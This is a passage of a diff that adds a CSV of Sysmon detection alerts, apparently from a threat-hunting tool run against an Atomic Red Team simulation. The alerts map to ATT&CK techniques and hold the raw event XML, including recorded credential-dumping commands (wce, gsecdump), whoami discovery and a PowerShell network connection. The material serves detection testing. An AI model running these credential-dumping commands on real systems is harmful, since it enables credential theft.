+    <Data Name=""ProcessGuid"">747F3D96-DD95-5D31-0000-0010D6914A00</Data>
+    <Data Name=""ProcessId"">6264</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
+    <Data Name=""ParentProcessId"">5840</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1003] Credential Dumping - Process,1563549077.149274,2019-07-19T19:11:17.149274+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\cmd.exe) tried dumping credentials through commandline ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wce -o output.txt&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:11:17.107912Z"">
+    </TimeCreated>
+    <EventRecordID>4115</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 15:11:17.097</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DD95-5D31-0000-0010B38E4A00</Data>
+    <Data Name=""ProcessId"">5216</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wce -o output.txt&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
+    <Data Name=""ParentProcessId"">5840</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549077.149274,2019-07-19T19:11:17.149274+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wce -o output.txt&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:11:17.107912Z"">
+    </TimeCreated>
+    <EventRecordID>4115</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 15:11:17.097</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DD95-5D31-0000-0010B38E4A00</Data>
+    <Data Name=""ProcessId"">5216</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wce -o output.txt&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
+    <Data Name=""ParentProcessId"">5840</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549077.107912,2019-07-19T19:11:17.107912+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:11:17.027188Z"">
+    </TimeCreated>
+    <EventRecordID>4114</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 15:11:17.016</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DD95-5D31-0000-0010148A4A00</Data>
+    <Data Name=""ProcessId"">5476</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
+    <Data Name=""ParentProcessId"">5840</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1003] Credential Dumping - Process,1563549077.027188,2019-07-19T19:11:17.027188+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\cmd.exe) tried dumping credentials through commandline ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;gsecdump -a&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:11:16.986676Z"">
+    </TimeCreated>
+    <EventRecordID>4113</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 15:11:16.975</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DD94-5D31-0000-0010F4864A00</Data>
+    <Data Name=""ProcessId"">3920</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;gsecdump -a&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
+    <Data Name=""ParentProcessId"">5840</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549077.027188,2019-07-19T19:11:17.027188+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;gsecdump -a&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:11:16.986676Z"">
+    </TimeCreated>
+    <EventRecordID>4113</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 15:11:16.975</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DD94-5D31-0000-0010F4864A00</Data>
+    <Data Name=""ProcessId"">3920</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;gsecdump -a&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
+    <Data Name=""ParentProcessId"">5840</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1563549076.48799,2019-07-19T19:11:16.487990+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname (  ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>3</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>3</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:11:08.184716Z"">
+    </TimeCreated>
+    <EventRecordID>4111</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3400"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">Suspicious NetCon</Data>
+    <Data Name=""UtcTime"">2019-07-19 15:11:03.652</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
+    <Data Name=""ProcessId"">5840</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""Protocol"">tcp</Data>
+    <Data Name=""Initiated"">true</Data>
+    <Data Name=""SourceIsIpv6"">false</Data>
+    <Data Name=""SourceIp"">10.0.2.15</Data>
+    <Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
+    <Data Name=""SourcePort"">49744</Data>
+    <Data Name=""SourcePortName""></Data>
+    <Data Name=""DestinationIsIpv6"">false</Data>
+    <Data Name=""DestinationIp"">151.101.0.133</Data>
+    <Data Name=""DestinationHostname""></Data>
+    <Data Name=""DestinationPort"">443</Data>
+    <Data Name=""DestinationPortName"">https</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1563549068.184716,2019-07-19T19:11:08.184716+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( &quot;C:\Windows\system32\whoami.exe&quot; /user) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:11:07.994501Z"">
+    </TimeCreated>
+    <EventRecordID>4110</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 15:11:07.987</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DD8B-5D31-0000-001094584A00</Data>
+    <Data Name=""ProcessId"">5792</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot; /user</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
+    <Data Name=""ParentProcessId"">5840</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1563549068.184716,2019-07-19T19:11:08.184716+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( &quot;C:\Windows\system32\whoami.exe&quot; /user ) contain suspicious command ( whoami.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:11:07.994501Z"">
+    </TimeCreated>
+    <EventRecordID>4110</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 15:11:07.987</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DD8B-5D31-0000-001094584A00</Data>
+    <Data Name=""ProcessId"">5792</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot; /user</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
+    <Data Name=""ParentProcessId"">5840</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1086 ]  Powershell with Suspicious Argument,1563549052.700901,2019-07-19T19:10:52.700901+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell) in event with Command Line (powershell) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (&quot;C:\Windows\system32\cmd.exe&quot;) in directory : ( c:\AtomicRedTeam\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:09:59.931135Z"">
+    </TimeCreated>
+    <EventRecordID>4108</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 15:09:59.829</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
+    <Data Name=""ProcessId"">5840</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">powershell</Data>
+    <Data Name=""CurrentDirectory"">c:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DD37-5D31-0000-00109D4C4900</Data>
+    <Data Name=""ParentProcessId"">5632</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,1563549052.700901,2019-07-19T19:10:52.700901+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:09:59.931135Z"">
+    </TimeCreated>
+    <EventRecordID>4108</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 15:09:59.829</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DD47-5D31-0000-001015874900</Data>
+    <Data Name=""ProcessId"">5840</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">powershell</Data>
+    <Data Name=""CurrentDirectory"">c:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
